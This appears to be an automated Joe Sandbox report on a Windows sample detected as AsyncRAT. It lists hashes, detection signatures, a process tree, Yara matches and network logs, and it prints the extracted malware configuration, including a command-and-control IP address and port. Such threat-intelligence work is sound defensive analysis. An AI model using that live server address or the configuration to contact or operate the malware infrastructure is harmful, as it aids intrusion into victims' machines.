Edit tour

Windows Analysis Report
0pF5Vz4xG4.exe

Overview

General Information

Sample name:	0pF5Vz4xG4.exe renamed because original name is a hash value
Original sample name:	850932bf796d17da05dc8c531993db6423b56686ff7dc68cc0a802e87f827fad.exe
Analysis ID:	1447642
MD5:	769a1873247d5024808cf7bd70555b01
SHA1:	2e55be1191affa933438890fc34eb31136bef045
SHA256:	850932bf796d17da05dc8c531993db6423b56686ff7dc68cc0a802e87f827fad
Tags:	exevenomrat
Infos:

Detection

AsyncRAT

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AsyncRAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to log keystrokes (.Net Source)

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file does not import any functions

Sample file is different than original file name gathered from version info

Yara signature match

Classification

Process Tree

System is w10x64

0pF5Vz4xG4.exe (PID: 7156 cmdline: "C:\Users\user\Desktop\0pF5Vz4xG4.exe" MD5: 769A1873247D5024808CF7BD70555B01)

chrome.exe (PID: 6248 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 2744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"Ports": ["4449"], "Server": ["94.156.65.172"], "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI="}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
0pF5Vz4xG4.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0pF5Vz4xG4.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xfd07:$q1: Select * from Win32_CacheMemory 0x41cd7f:$q1: Select * from Win32_CacheMemory 0xfd47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x41cdbf:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xfd95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x41ce0d:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xfde3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x41ce5b:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: 0pF5Vz4xG4.exe PID: 7156	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.0pF5Vz4xG4.exe.b70000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.0.0pF5Vz4xG4.exe.b70000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xfd07:$q1: Select * from Win32_CacheMemory 0xfd47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xfd95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xfde3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0pF5Vz4xG4.exe

Malware Configuration Extractor: AsyncRAT {"Ports": ["4449"], "Server": ["94.156.65.172"], "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI="}

Multi AV Scanner detection for submitted file

Source: 0pF5Vz4xG4.exe

Virustotal: Detection: 50%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 78.3% probability

Machine Learning detection for sample

Source: 0pF5Vz4xG4.exe

Joe Sandbox ML: detected

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49796 version: TLS 1.2

Source: 0pF5Vz4xG4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Joe Sandbox View	IP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox View	IP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-3.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: chromecache_101.5.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${encodeURIComponent(e)}&text=${encodeURIComponent(aS.replace("{credentialName}",t.title))}" equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_101.5.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: </div>`}function mCe(t){return t.authenticationModes?t.authenticationModes.map(e=>e.type).includes("MSA"):!1}function fCe(t){let e=t.authenticationModes.find(o=>o.type==="MSA");return e?e.upn:null}function gCe(t){let e=t.authenticationModes.find(o=>o.type==="AAD");return e?e.upn:null}function hCe(t,e,o){return e??(Qt(t.email)?o:t.email)??""}function Dre(t){let e=mCe(t),o=e?fCe(t):null,n=e?null:gCe(t),r=hCe(t,o,n);return[e,r]}function bCe(t,e){let[o,n]=Dre(e);if(o){let i=t.querySelector("#report-msa-email-account");i.innerText=n}let r=t.querySelector("#opt-into-email-checkbox"),s=t.querySelector("#submitter-info");r.addEventListener("change",()=>{r.checked?s.hidden=!1:s.hidden=!0})}function _Ce(t){if(!t)return;let e=t.querySelector("#select-reason"),o=t.querySelector("#other-reason-textarea-container"),n=o.querySelector("textarea");!e\|\|!o\|\|!n\|\|(e.value==="Other"&&(o.hidden=!1,n.required=!0),e.addEventListener("change",()=>{e.value==="Other"\|\|e.value==="14"?(o.hidden=!1,n.required=!0,n.disabled=!1):(o.hidden=!0,n.required=!1,n.disabled=!0)}))}var Wt;function $re(){let t=document.getElementById("share-to-linkedin-profile");t&&t.addEventListener("click",e=>{let o=e.currentTarget,n=JSON.parse(o.dataset.credential),r=document.createElement("div"),s=vCe(n);S(s,r),Wt=new xe(r),Wt.show();let i=document.getElementById("share-to-feed-button"),a=document.getElementById("linkedin-feed-message"),l=new URL(decodeURI(i.getAttribute("href")));a.onchange=()=>{l.searchParams.set("text",a.value),i.setAttribute("href",l.toString())}})}function vCe(t){let e=encodeURI(`https://${location.host}/api/credentials/share/${_.data.userLocale}/${R.userName}/${t?.credentialId}?sharingId=${R.sharingId}`),o=1035,n=i=>new Date(i).getFullYear(),r=i=>new Date(i).getMonth()+1,s=encodeURI(`https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=${t.title}&organizationId=${o}&issueYear=${n(t.awardedOn)}&issueMonth=${r(t.awardedOn)}&expirationYear=${t.expiresOn?n(t.expiresOn):""}&expirationMonth=${t.expiresOn?r(t.expiresOn):""}&certUrl=${e}&certId=${t.credentialId}&skills=${t.skills?`${t.skills.map(i=>encodeURIComponent(i)).join(",")}`:""}`);return m` equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA\|\|{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_101.5.dr	String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA\|\|{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA\|\|{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_85.5.dr	String found in binary or memory: http://schema.org/Organization
Source: chromecache_85.5.dr	String found in binary or memory: https://aka.ms/ContentUserFeedback
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/MSBuildChallenge/T1?ocid=build24_csc_learnpromo_T1_cnl
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/banner_mslearn_tier1?wt.mc_id=build24_t1_learnpromotion_events
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_85.5.dr, chromecache_75.5.dr, chromecache_106.5.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_85.5.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_85.5.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_85.5.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_101.5.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: chromecache_101.5.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/$
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/issues
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/nschonni
Source: chromecache_85.5.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js
Source: chromecache_101.5.dr	String found in binary or memory: https://learn-video.azurefd.net/
Source: chromecache_101.5.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_101.5.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_101.5.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0
Source: chromecache_101.5.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: chromecache_101.5.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_101.5.dr	String found in binary or memory: https://schema.org
Source: chromecache_101.5.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_101.5.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: chromecache_101.5.dr	String found in binary or memory: https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=$

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
